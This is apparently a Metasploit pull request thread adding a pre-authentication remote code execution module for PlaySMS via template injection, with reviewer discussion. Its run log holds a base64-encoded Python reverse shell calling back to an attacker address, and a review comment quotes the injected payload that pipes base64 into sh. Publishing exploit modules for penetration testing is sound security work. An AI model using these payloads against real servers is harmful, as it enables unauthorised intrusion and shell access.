Playsms pre auth rce
rapid7/metasploit-framework pull request #13067
Opened 2020-03-12 12:48 UTC by touhidshaikh

## Description
This module exploits a Preauth Server-Side Template Injection leads remote code execution vulnerability in PlaySMS Before Version 1.4.3.This issue is caused by Double processes a server-side template by Custom PHP Template system called 'TPL'.which is used in PlaySMS template engine location src/Playsms/Tpl.php:_compile(). When Attacker supply username with malicious payload and submit. This malicious payload first process by TPL and save value in current template after this value goes for the second process which result code execution.

The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection

## Vulnerable Application 
Available at [Source Forge](https://sourceforge.net/projects/playsms/files/playsms/Version%201.4.2/playsms-1.4.2.tar.gz/download)

### Vulnerable Application Installation Setup.
 1. Download Application
 2. Extract : `tar -xvf playsms-1.4.2.tar.gz`
 3. Move In WebDirectory : `mv playsms-1.4.2/web/* /var/www/html/`
 4. make config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
 5. Change Owner : `chown -R www-data:www-data /var/www/html/`
 6. Set DB creds in config.php File. And dump playsms-1.4.2/db/playsms.sql in your playsms database.
 7. Now Visit : http://localhost/

## Verification Steps

 1. Install the application (Tested on HactheBox Frolic Machine)
 2. Start msfconsole
 3. Do: `use exploit/linux/http/playsms_pre_auth_rce`
 4. Do: `set rport <port>`
 5. Do: `set rhost <ip>`
 6. Do: `set targeturi /playsms`
 7. Do: `check`
```
[*] 10.10.10.111:9999 - The target appears to be vulnerable.
```
 10. Do: `set lport <port>`
 11. Do: `set lhost <ip>`
 12. Do: `run`
 13. You should get a shell.

## Scenarios
### Playsms on Ubuntu Linux
```
msf5 exploit(linux/http/playsms_pre_auth_rce) > set verbose true
msf5 exploit(linux/http/playsms_pre_auth_rce) > run 
[+] python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICwgICAgICAgc3VicHJvY2VzcyAgICAgICwgICAgICAgb3MgICAgICAgOyAgaG9zdD0iMTAuMTAuMTQuMjYiICAgICAgIDsgIHBvcnQ9ODA4MCAgICAgICA7ICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAsICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgOyAgcy5jb25uZWN0KChob3N0ICAgICAgLCAgICAgICBwb3J0KSkgICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgLCAgICAgICAwKSAgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAsICAgICAgIDEpICAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICwgICAgICAgMikgICAgICAgOyAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))"
[*] Started reverse TCP handler on 10.10.14.26:8080 
[+] X-CSRF-Token for login : 6724a9cdb72eccdf7a7456309053eadd
[*] Trying to Send Payload in Username Field ......
[+] Payload successfully Sent
[*] Cookies here : PHPSESSID=bodmgesqnfkrjtbhr3nohui0e2;
[*] Command shell session 1 opened (10.10.14.26:8080 -> 10.10.10.111:44564) at 2020-03-12 18:10:37 +0530
id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux frolic 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:22:43 UTC 2018 i686 athlon i686 GNU/Linux

```

2020-03-12 14:34 UTC, adfoster-r7 commented on modules/exploits/linux/http/playsms_pre_auth_rce.rb
> +        'DisclosureDate' => 'Feb 05 2020'))
Hey - thanks for the PR :+1: There's some formatting issues in this file - would you mind running Rubocop on it? That's our automated code quality tool. You should be able to run it with:

```
rubocop -a modules/exploits/linux/http/playsms_pre_auth_rce.rb
```

Let me know if you have any issues

2020-03-12 19:36 UTC, touhidshaikh commented on modules/exploits/linux/http/playsms_pre_auth_rce.rb
> +        'DisclosureDate' => 'Feb 05 2020'))
Thank You. 
 I guess Everything is fixed now.  :+1:

2020-03-19 14:28 UTC, smcintyre-r7 requested changes

2020-03-19 14:28 UTC, smcintyre-r7 commented on modules/exploits/linux/http/playsms_pre_auth_rce.rb
> +    evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64 -d |sh`}}"
The way this is getting executed is yielding a session, then after a minute or two, the session is dying. I believe this is due to the inherent timeouts imposed on the PHP [shell_exec](https://www.php.net/manual/en/function.shell-exec.php) function. This really needs a solution to ensure that the session is not killed by some timeout after it's established. I spent a little time experimenting with `exec` and `popen` with no luck.

2020-03-20 09:53 UTC, touhidshaikh commented on modules/exploits/linux/http/playsms_pre_auth_rce.rb
> +    evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64 -d |sh`}}"
actually playsms filter all special character like ```', ", <, > ``` etc from preventing to XSS. that's y I am using base64 encoding.

2020-03-20 09:54 UTC, touhidshaikh commented on modules/exploits/linux/http/playsms_pre_auth_rce.rb
> +                'RequiredCmd' => 'python'
already working on this .. :)

2020-03-20 14:13 UTC, smcintyre-r7 commented on modules/exploits/linux/http/playsms_pre_auth_rce.rb
> +    evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64 -d |sh`}}"
I'm not commenting on the characters exactly. I'm saying that the *way* that the OS command is invoked through PHP is causing the subprocess in which the OS command / payload is executing to be terminated by PHP after a couple of minutes. There's got to be a way to run the OS command in a way that PHP does not kill the process, perhaps through some ability to `fork` it into the background.

2020-03-23 12:39 UTC, adfoster-r7 commented on modules/exploits/linux/http/playsms_pre_auth_rce.rb
> +              'PAYLOAD' => 'cmd/unix/reverse_python'
Hey; I'm still new to metasploit, but am I right in saying that not all machines will have python installed?
If so, would choosing a PHP payload as the default be a good solution here?

```suggestion
              'PAYLOAD' => 'cmd/unix/reverse_php_ssl'
```

2020-04-01 15:25 UTC, smcintyre-r7 commented
Alright I tested this again. First, moving to the PHP architecture is good way to go. We know PHP will be on the system and (as you noted) it makes the module cross-platform.

Couple of things though:
- [ ] If you stick with PHP, then the module should be moved from `exploits/linux` to `exploits/multi`.
- [ ] The PHP payloads aren't working for me. I tried 4 combinations `php/meterpreter/(bind|reverse)_tcp` and `php/(bind|reverse)_php`.

I'm not really sure why the payloads aren't working. I reverted back to the previous commit to ensure my setup was still vulnerable so I know it's not that. FYI, I'm using a LAMP stack VM from Bitnami for testing.

2020-04-02 22:23 UTC, wvu-r7 commented
I have fixed the PHP payload and moved the module to `unix/webapp`.

2020-04-02 22:41 UTC, wvu-r7 commented
I believe the outstanding issues have now been addressed.

2020-04-03 14:23 UTC, merged

2020-04-03 14:26 UTC, smcintyre-r7 commented
Merged after a successful test! Also confirmed the meterpreter session was saying open :tada: 

Made one more round of minor changes in bd835e8f2d30ea08026f67d6663deef54933f932 where I moved the module to be with the other PlaySMS exploits and renamed it to more clearly reflect the nature of the vulnerability.

Thanks everyone!

2020-04-03 14:27 UTC, smcintyre-r7 commented
# Release Notes
This adds an unauthenticated RCE exploit for PlaySMS that leverages a flaw in `index.php` that can allow code to be injected into the template engine.